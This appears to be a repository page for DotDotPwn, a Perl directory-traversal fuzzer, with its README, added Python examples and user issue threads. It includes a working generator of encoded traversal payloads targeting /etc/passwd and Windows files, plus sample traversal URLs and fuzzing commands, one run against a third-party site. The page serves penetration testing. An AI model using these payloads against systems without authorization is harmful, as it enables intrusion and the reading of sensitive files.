wireghoul / dotdotpwn
DotDotPwn - The Directory Traversal Fuzzer

Home Page: http://dotdotpwn.blogspot.com/

License: GNU General Public License v3.0

Perl 100.00%
security perl traversal fuzzer penetration-testing

dotdotpwn's Introduction

DESCRIPTION

DotDotPwn - The Directory Traversal Fuzzer

It is a flexible, intelligent fuzzer for discovering directory traversal vulnerabilities in software such as HTTP/FTP/TFTP servers and in web platforms such as CMSs, ERPs, blogs, etc.

It also has a protocol-independent Payload module that sends the desired payload to the specified host and port, and it can be driven from scripts through the STDOUT module, which emits the generated traversals on standard output instead of sending them.

It is written in Perl and runs on OS X, *NIX and Windows. It was the first Mexican tool included in BackTrack Linux (BT4 R2).

Fuzzing modules supported in this version:

  • HTTP
  • HTTP URL
  • FTP
  • TFTP
  • Payload (Protocol independent)
  • STDOUT
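The engine behind a tool like this is the traversal generator: it mixes plain and encoded dots and separators into a base pattern, repeats that pattern up to a chosen depth, appends the target file (with its slashes translated to match the pattern), and adds suffixes such as a NUL byte. The following is an added Python example, not the project's Perl code; its encoding, pattern, target-file and suffix lists are illustrative choices and far smaller than a real engine's, and its min_depth parameter is an extension the original tool does not have (it lets you skip depths that a known URL structure makes pointless).

```python
"""Traversal payload generator in the style of a directory-traversal fuzzer.

Added example (not DotDotPwn's code).  DOT_FORMS, SEP_FORMS, SPECIAL,
TARGETS and SUFFIXES are this example's own illustrative choices.
"""
from typing import Dict, Iterator, List, Tuple

# Dot and separator forms mixed into the basic "../" pattern.  %2e, %2f and
# %5c are URL-encoded '.', '/' and '\'; %c0%af and %c1%9c are overlong UTF-8
# encodings of '/' and '\' that lenient decoders have accepted.
DOT_FORMS: Tuple[str, ...] = ("..", "%2e%2e", ".%2e", "%2e.")
SEP_FORMS: Tuple[str, ...] = ("/", "\\", "%2f", "%5c", "%c0%af", "%c1%9c")

# Filter-evasion patterns that are not a plain dots+separator product, each
# paired with the separator to use inside the target filename.  "....//"
# collapses to "../" after one pass of a naive "../" stripper; "..%252f" is
# a double-encoded "../".
SPECIAL: Tuple[Tuple[str, str], ...] = (
    ("....//", "/"),
    ("....\\\\", "\\"),
    ("..%252f", "%252f"),
)

# Target file per OS type, with the marker a successful read should contain.
TARGETS: Dict[str, Dict[str, str]] = {
    "unix": {"etc/passwd": "root:", "etc/hosts": "localhost"},
    "windows": {"boot.ini": "[boot loader]", "windows/win.ini": "[fonts]"},
}

# Suffixes appended after the filename; %00 is the classic NUL truncation
# against back-ends that append their own extension.
SUFFIXES: Tuple[str, ...] = ("", "%00")


def base_patterns() -> List[Tuple[str, str]]:
    """Return (pattern, separator) pairs: the dots x separators product plus
    the special patterns."""
    pats = [(d + s, s) for d in DOT_FORMS for s in SEP_FORMS]
    pats.extend(SPECIAL)
    return pats


def generate(os_type: str, depth: int = 6, min_depth: int = 1,
             suffixes: Tuple[str, ...] = SUFFIXES) -> Iterator[Tuple[str, str]]:
    """Yield (payload, marker) pairs.

    Each pattern is repeated min_depth..depth times, the target filename's
    '/' is translated to the pattern's own separator (so backslash patterns
    get backslash filenames), and every suffix is appended.
    """
    if not 1 <= min_depth <= depth:
        raise ValueError("need 1 <= min_depth <= depth")
    for pattern, sep in base_patterns():
        for n in range(min_depth, depth + 1):
            for filename, marker in TARGETS[os_type].items():
                translated = sep.join(filename.split("/"))
                for suffix in suffixes:
                    yield pattern * n + translated + suffix, marker


def payload_count(os_type: str, depth: int = 6, min_depth: int = 1) -> int:
    """Number of payloads generate() produces for these settings."""
    return sum(1 for _ in generate(os_type, depth, min_depth))


if __name__ == "__main__":
    for payload, marker in list(generate("unix", depth=2))[:8]:
        print(f"{payload:40s} expect {marker!r}")
    print("unix, depth 1..6:", payload_count("unix", 6))
    print("unix, depth 4..6:", payload_count("unix", 6, 4))
```

Each payload is yielded together with the marker to look for in the response, which is what lets a fuzzer run different target files without the operator passing a pattern for each one.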

REQUIREMENTS

Perl modules:

  • Net::FTP
  • TFTP (only required if fuzzing TFTP)
  • Time::HiRes
  • Socket
  • IO::Socket
  • Getopt::Std

As root, install any missing module with:

# perl -MCPAN -e "install <MODULE_NAME>"

or

# cpan 
cpan> install <MODULE_NAME>

EXAMPLES

Read EXAMPLES.txt

CONTACT

Official Website: http://dotdotpwn.sectester.net
Official Email: [email protected]
Bugs / Contributions / Improvements: [email protected]

AUTHORS

 Christian Navarrete aka chr1x         Alejandro Hernandez H. aka nitr0us
   http://twitter.com/chr1x              http://twitter.com/nitr0usmx
      [email protected]                  [email protected]
                                         http://www.brainoverflow.org

 CubilFelino Security Research Lab     Chatsubo [(in)Security Dark] Labs
   http://chr1x.sectester.net          http://chatsubo-labs.blogspot.com   

CHANGE HISTORY

Read CHANGELOG.txt

LICENSE

DotDotPwn - The Directory Traversal Fuzzer
Copyright (C) 2012 Christian Navarrete and Alejandro Hernandez H.

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program.  If not, see <http://www.gnu.org/licenses/>


dotdotpwn's Issues

vulnerable results 403 forbidden

Hi,

I've run dotdotpwn v3.0.2 against a web application that has reported 304 traversals.

I ran the following command:

./dotdotpwn.pl -m http -h xxxxxxxx -S -k "root"

All of the vulnerable traversals have a "?" in them, not sure if that is relevant. An example is:

[*] Testing Path (response analysis): https://xxxxxxxxxxx:443/?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25afetc%25c0%25afissue <- VULNERABLE!

But when I enter that URL into Chrome it comes back as 403 forbidden.

If it helps the server is running nginx v1.11.3

Thanks for your help!
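A keyword match on its own is weak evidence, which is what makes a discrepancy like the one above (the tool says vulnerable, the browser shows 403) worth checking before reporting. The following is an added Python example, not DotDotPwn's code: it classifies a response as a hit only when the marker appears in a successful response, and shows how a loose marker like "root" matches ordinary text where "root:" anchored at the start of a line does not. All sample responses are constructed for this example; the 403 page follows the default nginx layout.

```python
"""Response analysis for a traversal fuzzer: is a hit really a hit?

Added example (not DotDotPwn's code).  The responses in SAMPLES are
constructed for this example.
"""
import re
from dataclasses import dataclass
from typing import Dict


@dataclass(frozen=True)
class Response:
    status: int
    body: str


SAMPLES: Dict[str, Response] = {
    # What a real read of /etc/passwd looks like.
    "passwd": Response(200, "root:x:0:0:root:/root:/bin/bash\n"
                            "nobody:x:65534:65534::/nonexistent:/usr/sbin/nologin\n"),
    # Default nginx 403 page: no marker, and not a success.
    "forbidden": Response(403, "<html>\r\n<head><title>403 Forbidden</title></head>\r\n"
                               "<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n"
                               "<hr><center>nginx/1.11.3</center>\r\n</body>\r\n</html>\r\n"),
    # An ordinary page that merely contains the word "root".
    "blog": Response(200, "<p>Never run the daemon as root; use a service account.</p>"),
    # Constructed: an error status whose body still carries the marker,
    # to exercise the status check.
    "leaky_error": Response(500, "Internal Server Error\nroot:x:0:0:root:/root:/bin/sh\n"),
}


def classify(resp: Response, marker: str, anchored: bool = True) -> str:
    """Return 'vulnerable', 'keyword-only' or 'clean'.

    anchored=True requires the marker at the start of a line, so "root:"
    means the first field of a passwd entry rather than "root" inside
    running text.
    """
    pattern = (r"(?m)^" if anchored else "") + re.escape(marker)
    matched = re.search(pattern, resp.body) is not None
    if matched and 200 <= resp.status < 300:
        return "vulnerable"
    if matched:
        return "keyword-only"  # marker seen, but the server refused or failed
    return "clean"


def triage(marker: str, anchored: bool = True) -> Dict[str, str]:
    """Classify every sample with the given marker."""
    return {name: classify(r, marker, anchored) for name, r in SAMPLES.items()}


if __name__ == "__main__":
    for m, a in (("root", False), ("root:", True)):
        print(f"marker={m!r} anchored={a}: {triage(m, a)}")
```

Running it with the loose marker flags the blog page as vulnerable; with "root:" anchored, only the real passwd read is a hit and the error-status body is reported separately for manual review.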

No Cookie Usage

Hey,
There's no flag to use cookies; that makes the tool less useful from my perspective.
It would be nice to have one.

No issue

Net::FTP is up to date (3.08).
TFTP is up to date (1).
Time::HiRes is up to date (1.9739).
Socket is up to date (2.021).
IO::Socket is up to date (1.31).
Getopt::Std is up to date (1.11).
Switch is up to date (2.17).

Basic auth for http?

How can I give a user:password@host combination for a host that requires basic auth? Alternatively, can I set a header to produce the same result?

Error load scriptlib perl

After installing the Perl module on a Mint distro,

it causes the error below:

Can't locate TFTP.pm in @INC (you may need to install the TFTP module) (@INC contains: . /etc/perl /usr/local/lib/perl/5.18.2 /usr/local/share/perl/5.18.2 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.18 /usr/share/perl/5.18 /usr/local/lib/site_perl) at DotDotPwn/TFTP.pm line 13.

Solution
Replace the line of code use TFTP; with the following line, because the module is in 'Net':
use Net::TFTP; # /usr/share/perl5/Net/TFTP.pm

Make -k switch optional and use sane defaults for patterns

Currently the http-url and http modules are requiring a pattern passed via the -k parameter like -k "root:"

It would make sense to use sane defaults for each tested file like:

/etc/passwd -> root:
/etc/hosts -> localhost
boot.ini -> [boot loader]

and just make -k optional where people can overwrite the tested pattern.

Web Server (all-around-audit-solutions.com) Didn't Respond

Hello!

Could you please help me resolve the issue that I am having when trying to dotdotpwn my website? I downloaded the most recent version of dotdotpwn yesterday to my Kali Linux VM. I have been trying various commands, the latest being:
./dotdotpwn.pl -m http -h all-around-audit-solutions.com -M GET
The response that I keep receiving is:
Web server (all-around-audit-solutions.com) didn't respond !
Could this be because the website is hosted on a GoDaddy server?

Thank you very much for your time and best regards! BTW, I am impressed with your tool as I was able to run it against other domains.

Single deepness / deepness range

Hi,

for some scenarios it could be useful to set a single deepness or a deepness range for the traversal pattern. For example, if we know that the traversal is in this URL:

http://example.com/foo/bar/foo/bar/foo.php?=TRAVERSAL

it doesn't make any sense when testing for /etc/passwd to traversal like:

http://example.com/foo/bar/foo/bar/foo.php?=../../etc/passwd

The minimum traversal deepness should be 4 in this case, which could speed up the testing a lot, as deepness 1 to 3 probably won't get any results. Any opinions on this?

can't find the Reports folder

Hi there,

I installed the latest version of dotdotpwn on my Windows machine, and its modules including Net::FTP, TFTP, Time::HiRes, Socket, IO::Socket, Getopt::Std, Switch. When I executed dotdotpwn.pl and pressed Ctrl+C to terminate the test, it told me: Report saved: Reports/TEST_URL_05-28-2016_09-13.txt.

Why can't i find the report folder?

Please help, thanks

System-wide install

While trying to install dotdotpwn in a docker image, I noticed the following at run time when executing dotdotpwn

Cannot open User-Agents.txt file: No such file or directory at /usr/lib/perl5/vendor_perl/DotDotPwn/HTTP_Url.pm 

dotdotpwn was installed that way

cp -r dotdotpwn-3.0.2/DotDotPwn/ /usr/lib/perl5/vendor_perl
cp dotdotpwn-3.0.2/dotdotpwn.pl /usr/bin/dotdotpwn

Libraries are found from /usr/lib/perl5/vendor_perl, no problem, but this specific resource (User-Agents.txt) cannot be found by HTTP_Url.pm even though it is right next to it

bash-5.0# ls /usr/lib/perl5/vendor_perl/DotDotPwn/
BisectionAlgorithm.pm  File.pm                HTTP.pm                Payload.pm             TFTP.pm                User-Agents.txt
FTP.pm                 Fingerprint.pm         HTTP_Url.pm            STDOUT.pm              TraversalEngine.pm

I do not know how relative paths are handled by Perl, but I wondered if my current problem had anything to do with this specific line

open(AGENTS, "DotDotPwn/User-Agents.txt") or die "[-] Cannot open User-Agents.txt file: $!";

It might sound naive but, from the standpoint of HTTP_Url.pm , isn't User-Agents.txt supposed to be at ./User-Agents.txt instead of DotDotPwn/User-Agents.txt?

I am a complete noob with Perl so I am open to any cleaner way to install this tool system wide
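The failure described in this issue is a working-directory problem: a relative path such as "DotDotPwn/User-Agents.txt" is resolved against the directory the process was started from, not against the module that opens it, so an install that works from the unpacked tarball breaks as soon as the tool is run from anywhere else. The following is an added example, not DotDotPwn's code and in Python rather than Perl, that reproduces the failure in a temporary directory and shows the fix of anchoring on the module's own location (__file__ here; in Perl, dirname(__FILE__) from File::Basename does the same job). The file tree and its contents are constructed by the example itself.

```python
"""Loading a data file that sits next to a module, independent of cwd.

Added example (not DotDotPwn's code).  The install tree below is built
in a temporary directory for demonstration.
"""
import os
import tempfile
from pathlib import Path
from typing import Dict


def load_cwd_relative(rel: str) -> str:
    """The fragile way: the path is resolved against os.getcwd()."""
    with open(rel, encoding="utf-8") as fh:
        return fh.read()


def load_module_relative(module_file: str, name: str) -> str:
    """The robust way: resolve against the directory of the module file."""
    path = Path(module_file).resolve().parent / name
    with path.open(encoding="utf-8") as fh:
        return fh.read()


def demo() -> Dict[str, bool]:
    """Build a fake system-wide install, run from an unrelated directory,
    and report which lookup succeeds as {'cwd': ok, 'module': ok}."""
    results: Dict[str, bool] = {}
    with tempfile.TemporaryDirectory() as root:
        # lib/DotDotPwn/ stands in for /usr/lib/perl5/vendor_perl/DotDotPwn/
        lib = Path(root) / "lib" / "DotDotPwn"
        lib.mkdir(parents=True)
        (lib / "User-Agents.txt").write_text("Mozilla/5.0 (example)\n", encoding="utf-8")
        module_file = lib / "HTTP_Url.py"  # stands in for HTTP_Url.pm
        module_file.write_text("# placeholder module\n", encoding="utf-8")

        # The user runs the tool from their home directory, not from lib/.
        workdir = Path(root) / "home"
        workdir.mkdir()
        old_cwd = os.getcwd()
        os.chdir(workdir)
        try:
            try:
                load_cwd_relative("DotDotPwn/User-Agents.txt")
                results["cwd"] = True
            except FileNotFoundError:
                results["cwd"] = False
            text = load_module_relative(str(module_file), "User-Agents.txt")
            results["module"] = text.startswith("Mozilla")
        finally:
            os.chdir(old_cwd)
    return results


if __name__ == "__main__":
    print(demo())
```

The same rule applies to the Reports/ directory mentioned in an earlier issue: a relative output path lands wherever the process happened to be started.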

Web server didn't respond

Hi there! Great tool!

I try to run it by using:

$ ./dotdotpwn.pl -m http-url -u "http://amazon.de:80/TRAVERSAL" -o unix -k "root:" 
...
[+] Report name: Reports/amazon.de_08-27-2014_13-26.txt

[========== TARGET INFORMATION ==========]
[+] Hostname: amazon.de
[+] Setting Operating System type to "unix"
[+] Protocol: http
[+] Port: 80

[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (unix)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 10560

[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)

[+] Replacing "TRAVERSAL" with the traversals created and sending

[+] Fuzz testing finished after 0.02 minutes (1 seconds)
[+] Total Traversals found (so far): 0
[-] Web server didn't respond !

Web server didn't respond. But the host is obviously online. What am I doing wrong?

Thx in advance,

Victor

Update to newer perl

Hello, could you update to the Perl v5.14.2
i get this error

Can't locate TFTP.pm in @inc (@inc contains: . /etc/perl /usr/local/lib/perl/5.14.2 /usr/local/share/perl/5.14.2 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.14 /usr/share/perl/5.14 /usr/local/lib/site_perl) at DotDotPwn/TFTP.pm line 13.
BEGIN failed--compilation aborted at DotDotPwn/TFTP.pm line 13.
Compilation failed in require at DotDotPwn/BisectionAlgorithm.pm line 36.
BEGIN failed--compilation aborted at DotDotPwn/BisectionAlgorithm.pm line 36.
Compilation failed in require at DotDotPwn/HTTP.pm line 11.
BEGIN failed--compilation aborted at DotDotPwn/HTTP.pm line 11.
Compilation failed in require at ./dotdotpwn.pl line 59.
BEGIN failed--compilation aborted at ./dotdotpwn.pl line 59.

Changing port from default just shows 443

If I use -x $InsertPortNumberHere, in the banner before it runs it shows "Port: 443". When I omit the -x option, it then display the default port for the module selected. I've only tested this with the http module so far.

too slow

is there any option to increase the speed of the tool?
thanks in advance

https

Will there be HTTPS module in future? Now it is not supported.

Setting Authorization (or any other) Header

I would like to add an authorization header to requests in "http-url" module, maybe somewhat like with curl - curl -H "authorization: Bearer ...":

dotdotpwn -m http-url -u https://example.com/foo?bar=TRAVERSAL -k "root:" -H "authorization: Bearer ..."

Is this feature in place? If so, I guess it needs to be better documented, otherwise I suggest implementing such feature.

Ping reply as condition to continue the test

Hi! First of all, congratulations for the great App.

I would like to report a behavior I believe will help many users. In HTTP_Url.pm, the code dictates that the app should terminate in case of a ping failure:

if(!$ping){
    die "[-] Web server didn't respond !\n";
}

I was testing a windows box where firewall would not allow ping, and modifying the code allowed me to proceed with the test.

While by design, modifying the message to mention 'ping failure' as the cause would narrow down the issue for users.

Continue with your great projects! :)
